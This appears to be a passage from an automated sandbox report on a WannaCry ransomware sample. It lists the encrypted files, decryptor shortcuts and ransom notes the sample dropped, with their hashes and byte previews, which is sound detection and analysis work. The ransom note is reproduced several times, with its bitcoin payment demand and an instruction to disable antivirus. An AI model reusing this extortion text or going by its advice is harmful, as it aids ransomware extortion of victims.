Preview:	WANACRY!....$.z..8..).}.. ...........z+...q7.?.O.g....2mf...t~..c...J...rp..V..LSD..T_Ns2.5.!.zh.m>.L:M'_.a..E.GR0.....C7,.....$.%._R3I.7..d.fa.Z.B._...j.I1...._..cC..{#..5%KI.'.;.9K..i.......).L)w..D!..i....].cz.kR....oA..A..-.O..._."o.U5..8/...............wPVeG.d1e>..O....R.j..E.-6d.*..`N.B...f..B..\|...\ os..r.7..McH.......<R..dL...v......F.+.....O..H].K..%\..%k.a..Rbd{.P.yj.O.....8.i..4.s.!....P.q...K.......d4^'/$7.....".W..K.N.....<.-.ZL.q......p^..}.....cz..+to...=.A..<....'X....^..J.!..bo..K2.M?3G...Gs...4.i....I.WP....-....5.._..QE.J$I.\...]..y...]..zZ#..F.d..H.<?....."...s1.......:...[3\..um'.{...~..}xf..1.H...X..<.9.....#...(.X..N[.<.;....T.B.....d\|?.....^..O}..A...&.qD.s$>.}9_.m..V.>/ ..)......Eeo>..yl...N..I.F...5.@W....y.\|:.ok.rC{....)Yu..M..}O.........E..#+.."O44.M.......k.......,.F.l.....=..U..T..T..h.>..COQ,8.@.'..A..Z...>2...o......s-4.lW..W.l.8...<..K...lf.\|...1.{.Z...G..%.^0.5....s.......3.._.p..6<.=..+..e

C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	130040
Entropy (8bit):	7.998697587166176
Encrypted:	true
SSDEEP:	3072:mmZMXhQjwbguhPQwjpYuyQWYqYAQKEY/ckgU7yK7Rkk5F+kF:jY0tKpYYWY/YEDzU7zOk7DF
MD5:	C186D60F0F0FFE3247B12DD62AF6F75C
SHA1:	D132D81B5DA3FB10433B01CA77E93222CCFA0CF9
SHA-256:	090668CF6B795914F9C55B1288ACAF0AE5905E46BC4346905218958026662DDC
SHA-512:	8E44DA3B36F142FBC3F4E25C158E219F24F77D7D15F33472BE53A7F01B82CB3CD0E24A3CAB319829679359E4CFA86E240E701938CAFC75900EE476EF0C59B256
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......iq.Utm..\|@....s..<..Y"..M..8.........+jVA..T....L>......\|$.z..'.d.tZj..h...tK...(...!....".....F54.09v[.9.\|..qtz.#.5x....-.....jx.u...+G.0.(.M..B.....L.0..Z)MO...#.$.+bG(>b.<.Jj.a/...C"."F..P.t..9..BS{G....'..2...&..$.d.bp..ma@2f..5..WB...1................]V.r.<n.&.......4.?.....C-.kC.........2R.r.ar9z.u...m9,.4...1.....D.....o..3Ov.E.J......{..?e.m...^......(.9.4.:..$[.8Gf>.....z....1w..3y%\|U.;..{..-..J{.N.t..x........vp.H G...../B..>..i\|h....N.....w...z.".'Rgq...)<..#4...............]hO..BM...c.6...Gk.]....d8#R.7..x]J....c.....q...#+.t1.%.1...o..4}K..\W<A..%...fZ.7....m...k.f.i+ytp_9lH....C\|........4..h......x.~R....bV.........{.......+.9ve.B.Q.lm..S.E..X[.~=.R..0n.i.).>..a@..R.A*.3#c.%....@.GS)...O}~A.P.._.`.,i7...$L..>..e<.(....x.z..e...+.`W....7q.......qw .WD.%....i)..3.J.B..]0..8.#..]Z%....v.......Z}...q.....5).5C.yF.E9.t@....r<...D[..5.(.l...w&..H..$m.\|...]#P.V.J..[Xa......%.^cu....45.J..C...0......@vC......b

C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	29160
Entropy (8bit):	7.994053129452439
Encrypted:	true
SSDEEP:	384:Nuf2ClyAmK2CuViDRXqoLLEt5xDeBXNeGG7VP+cMUGUTrcOx67i6gCAlhLNsO3wo:RPatXR/GVCeGwVMHOGwNDLN06QE9tF
MD5:	70142716A9209B4097EA3F7A606AF5E8
SHA1:	E0AD4CD4E0A7F69AC7FAF667867C6A1AA9FE807F
SHA-256:	6D66EA5CDC4A54EC01E6C7E0B5B2F4AA3F1A48144FE5AFA3B77FBE7A5BF56A70
SHA-512:	E9F1E18EEF1B0008CA74D73D2959D6A0EF47A7198C370C544FA13B119A3C599C8375A2155405E8A7A8B8F9EE215D574C5A5A9F967AD0FE241C93BD133C17B86E
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....F..%..b.3 .K..OKc...U..b..... $.D.7.9..!..M.n.uq%..d7....E..l....._Qw`p......:.J..d.i...#.T..J..we.0.8..T.B_/<.~...m...+.......+........=*%...X...,,ZY.W........l..~.....z._...@s...G+.C....L.MVI.. 6Es..P.."...r........ZH5.....3.....V....8.f9f./u.;`.....p......a4.) .).I0rA^f..w}j..r.8-P.8.....6..ka..V".g....1r.x.]lR....$...r..'..."..........h.0kH....<j......a..\|'s..g3.?z8(..<....+r.AT.p.(.no...Bl.7iC......\|U.....n.G\".7...)........c.........gx........2..yp.W..K.o&..:a.t..:......s8.."K.[..I..S..&.3....)..BTzR.;h.w...5...DZ/.$W....$^.1.[t72.#..[.j..j"..fd..!..).)...-.P!.6.x.)...w".K\|..w.Z...V......'+..J.}....3qr.:..&nWI.G.y..y..g.f.F..`..Xdv.. zcl..X3.uW.S.9.M.W.JJ{..7...s...%.Bo...P'..wB^....g5m..R~...B.3..4.>....z..5n.'...!?..q.-.+....\.."..T.....J......R..^.u...DL.v./.:a7).;...^.2....[..u...k...[..../o.-F.:e.A`...R....-..9.....u..Q..SLo.e"...r.......uh............8].2_`....q.....R.B.h..\|..n\|......!.N.iD...4........0.@x.@..q.0H

C:\ProgramData\Microsoft\Diagnosis\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\Diagnosis\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	168216
Entropy (8bit):	7.998916229693143
Encrypted:	true
SSDEEP:	3072:7bQguIB6oAwaaFfjgHfM99OqNpHHcMz8C9kb3u4JW0x8NZHSBNujoX+:7cMQIbqf0PNVcm9kbTJiXHWEcX+
MD5:	547F755B61D288FDA14E03C32BDFA4C7
SHA1:	730B85173938EA09AD2F969E7C89918BE43B0F24
SHA-256:	973007AC53AA2808DEC9C8D7FAAD693F6EC040CD765F1E062216F45063502541
SHA-512:	EFAC792568F1D85523861030DE2BEA8C8AB3BB39F03E13ABBB246F7D3213433FF3E153971B2FD2E0F9C25E86F93D8C9D88DD2D6CE9B494F3C7D173EE783C45AD
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....?.!...6..O..0K..\.8....u?..$."-k.4.......E!.@DeM....s.0'A..K_f.TJ..x.)s....J.v..9..y..]._g&.....C.r.../B ?>....o.\|r..M$.Rq...~.p%AQ..D.1..FU..A.P..Ij$.<.b..;.I.9X....K..$.h%+..zy.../Y._Z...:..M...2....V.]F...O.@...p.#T....F ch.V=...\|....x.x..................b...wv?.j..y.....RAK.=xqQ2]...P..-+....^Af..$%G......W.>....q.;.....Y.U]k.C.&$5v....]5.......Q.-D.@V,........7 . nI-./..$.\.......b.>..X....Z!eS...P...#..'...yQf.b1.l.R.<......[x..n)[B<Rb2...../.... .ne.YQ..\6.~.....w..Nf./. E.@$m..H.R..I..N...08e>.O... ...0...1.4].C.:u].B.....6...........D....;..f..Q..).q. 8...^.v.C.1..t6.)Ni...C.w.T.Y.}&..*[.vW...>>....%.e...f.....w....>\|;@9...3.R.%....0..Y#IS....;I.a(........%a.U..+n4b=?-8......(.7.5j".=.>.&~..=c.....w.uX..(.t...g....0].NA....]v3O.g..N..Na...Q....6.~..R..3.?.F@w T.I.?........'....z."{....4.A.sY8.l...Pz.shg..(....<T...?.H.@..IT.O"..m^.O..G&.-.Qc_.L.H.S.8 ......\QsI...?O..s1../e.;.2...`.S0+..:..-.AA...[.P...8q.....

C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	33048
Entropy (8bit):	7.994957933112553
Encrypted:	true
SSDEEP:	768:o+4T6mQsJJISCqSQG2PYZ1JiTjSs5njkYEZZtkts:o+e8hQG2QZ1JivSsFcZSts
MD5:	BA9A40A91D0BE25737A0665CDC4F577A
SHA1:	7D3DBFD396D9626FB66F3CCD2C959CDC13E32AD4
SHA-256:	73893DF53A963D3F2C34E4FBC701803D6F5AA12B82CC459F312413935A8FA03B
SHA-512:	3F29C8F0A5B05927F12559134C24829C012B3E0991822B7387F80FB30FE80591C0F3BF9074A28AEB6679F9A0AED50D2CD1AF02649C1864BAB75CCA7222C19561
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......."...FH.$#.3...i.YG.Y......P].M..E..8..h2\....8.2.i.N......'@'.._.....!..0.w..M}...Vx..........d...[...\|c!..m=.......&RO......M....X..=.e.`...bHE.k.....j.4......+[..\.%`^=f..!.@o.)n3:.v..'..u..`......n..[u...\Z=.X5O~...X.@..yw...a..D..............?.......RM....D.......t...TR.....@$...,L5 .0..;x..H.F.....j.wV...../E.q......p.Al..V,.8n....s...s.~..r...}x....'...q...x...;=.z.....4.e.R...g]....~..45.c.'.\|...x..W)...&..^QE.e...~.;....+.J.z8.^.I.1.z.,z.>....M..89A......fL.Q..).xY.#&...\Pp..rLR.4......7E"......tv.?@/.8&../..G..p.*Y..O...>.-.p.z\{D.x...9...8&L...gxG:..G... ...B,..W....hy.\|O`A(.mj...M.>....,. .L.xF..a.I...o..z\....y.}..IR...q`.]~.~-......\|F..f.7...E.......:..&d....}.'9j"....c.Q.w\...........$z.(...-BR}..O..i~.....K..!f.........Ik+......]....L.....R.z....f..1.H.QK..K,...:.(.....j.$....R..."Uo...rJ...n.,....B.N.B.....!.@.....o..E%.h......o.e.S=!`.....j..0S.\|K.....{..UFi.P.D.S...F.9.1n...kw.Mj../P.....w

C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24856
Entropy (8bit):	7.992505439012138
Encrypted:	true
SSDEEP:	384:yzCE+vD4rHalevNHpPaU3pfnhtBBSYG07HPUOdpQm3PEpUujiJjDmHLBmLnvUUSp:eCnA+crvh5j7UYOqPEp1jyjDmHVm4X6U
MD5:	C79B7F3616804042B957EF03219C8CB4
SHA1:	E768D3F5AA3C35765EA228DF51B42974D1D120A6
SHA-256:	8F0F24DE3B291F4546F21A3195DF82EBE87E3F1D4E6F63882EBDAC56C6C8F794
SHA-512:	9B5639677BAC217721E15421188569C8EF3BC7AF787E559B479FA619B0A9FCA291925C362F5BE34E1340C9340BED3BFC48466CCB34000B26A7FC3BEBB79F5A0B
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....>.H.....g.g..B.j.Y\|&...M.h.......w.b...I...:.X.....v...w....UYH.y....^...0X.SYB...RF./...U....>..k0<...3}$.q.DS+l.]6..W../K.xo\|T.;..,}.L.W._:+a..\W.n.......5.^...d.w...z..4...?......g2.+.!Z....!. ....l..D.H..O.I..%. . J..W..T.[P..j ./$.K?...,^.z1x.......`......./>.}........g..cj`?.\...i.bF[.{...\|..u9.QRbV...G=..;........l.....mt?A...f?D\....ct4v-1...c1.K./b.>.1......}..H;.,@.'....^.;6....0...g...iW..jR.,..vL..(.7Q...tb55...z.j.B...t.q..q.D.=.....!..a...'..z...%....INX....>k...n}O..]...l..Y.a"G.<ux.J%.YG.4.....-...pX.@.{o.....+..H.z[i..oUt.\9......{.f[,.Y.3..^.{.Z~...I.P...k}s......\|.S0.W...!Q...B7.......W..._.A.&.2.A....1..x.QzX..^.r....8....?..6r..y;....R..\.."5..bn~u.&5...PQ..G.~U..1z~>......'.........\W.....D...Hbg.J:b.vT.,.<.d..7/..8#..>....cO...1.......?8b..m.=D..V..{.......5.....0.../..:.g@.d..u..^LQ.."......cuT,...).{.f..v.p1...(....C)..u.$.#pEp]..z.z...'1.Z..:.=/..nt.._.c8...O.+.+.M.........C.....U..,,..!.....wZ.

C:\ProgramData\Microsoft\Diagnosis\osver.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.119630580614208
Encrypted:	false
SSDEEP:	6:bkE26NOdqRaCHAmIEiV5+R+ukQR9gEVFYwzSV+f9deuHnySNX:bkEJNGOA/tV5uZVaEVG3cBySF
MD5:	F374B9FB250DF7BDA6FB259EB0FC45EF
SHA1:	13F4C385D3F8E74679681CCB47D5C1BF2BB25FEA
SHA-256:	8F76FF91945E0CEED1A9855694F912CA7DD4B34CE8BF89F9EA2926A45D401468
SHA-512:	F4E3242F0FAD9A62371F90F85683EF4CEDB0BDC660C4373E515C756272D66718F19FF007760273000E018E93CF61649C47611DCBDDC3137F26404242EF6C5204
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....C..S.#NLr...&..Q.!.8.8....{ ..]....U....E.1I\|...PPw...CC.C9j.\j.b.u6....-...[./S....h..,S.........}..@....t6g.{......h...s...P...D..f...M.[..N.R-\...y.x.8..i...z0.....T.......{D%..}U....8..\|.........;Nr@.'T^7.t.U!D..GU.:.C...V.J..X!...G.m.-.Y.*..6..............:#.@S..j.5B.I.

C:\ProgramData\Microsoft\Network\Downloader\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\Network\Downloader\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	25166104
Entropy (8bit):	7.999993280758594
Encrypted:	true
SSDEEP:	393216:DIxi6119Wrdrn226UKeOmJk7NNMSDOoZyksTOqcy2OfvA5O9q4RdciEP4agZn8Z5:DIhAtnU3PsSqgOfYs9q4LwLgxqxxR
MD5:	0AD1E936AC9463C64D5AF1E391F5025B
SHA1:	19EB8C8AF46F703588DC33F37FC7E9CA9FCB8ED5
SHA-256:	70AC17920D5C297C891EEB3E6B875F10C0FE71DB3BFDAC9869E6ABF0A1717590
SHA-512:	5C6E6327CDC7951B01FFDF4AD0B39F19E55F973D14A1380238A0109764FE501441161ED8674096722DAB5F1E194072AF9F798F407247CC7BFF09723889CCDF66
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....>/E....Y[.]...x...<.....\|.M.`v!w....h....]..\|j..f.G....wZ.........8M......q.+...vs..q....$.........~.,'K.._z....?R..[LO......D3...G......g.p...7..\t........B&L..\J......b..b.~?n.J.%.H...;......=....7...6\.=W.....Ta..\XR-.e g.P..}....s..U.................B.YOx..a.~...+.%.%...._..9......%O2E..X.9.2.;hU?....\(Sw...#6E..5..E.nk.....P..1...<(....tb......K...x.\|~.....)h.t{.... {.m-...)D....]..a.A.g....9(..........mJ..p..\.....?.7nO..i../]..b....h;a.sNC{.2.F.. ....2n.U.$.Y..1.\6..S..M8.<...`......_..Am/..M...j..........6.y.Ch.........%.t.C...J`ud...0Q.H.8..c.g.ln.....E.NQ#E..mL..~.H_V...-...D8}......:..5.Q>'t.r/....f.h..V.gC..1.B. .X;/..B..{...~.d[.>...G..8.?.k..6.&f...O.;Q...h7..s.._D.$...b0.\|...a.=.Q....G~..(,qd..sC..........?..w.2..\|...]..=eR....E.-.[5.C.L..}K'...8A=.....&....+c%.+D/....&/..=.52V...........".O...eS...[B...;.I$)&..U.....;..\|&L.8$...L..L..^bh...9.f.f./}7.kU..x..0..G.>&..YK...S.Vg...0B..U.3.5.....wm..* k...'lX...m.m.;3.

C:\ProgramData\Microsoft\SmsRouter\MessageStore\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\SmsRouter\MessageStore\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	196888
Entropy (8bit):	7.999198880806812
Encrypted:	true
SSDEEP:	3072:67I+9Qruys08VcfCOxxHXmz0Fx0XIO90F0GpMBM7ZWFU0iluVOV5MOrHb34vW+p0:n+5yMVcP9a0RE0D4u02OOVGYHb349p0
MD5:	A1F6B77306D41A9075D21AE4DC75A77E
SHA1:	746E3F8F648F5AE250EF1DF5C77D74A2E2CA95FE
SHA-256:	9EAB88AE03D43B14514083EC77F6B7B6728F3EB80F724F435ED814001D554D8B
SHA-512:	628D8D6284A2A56326C3CE8738E84F3CCEF3BE3199E747B1CAFE10CB85CDFD56F42A3AFC84B4353428EB53D05B77C866AE42CFDAE52603BFD5D461B7CC2027A4
Malicious:	true
Reputation:	unknown
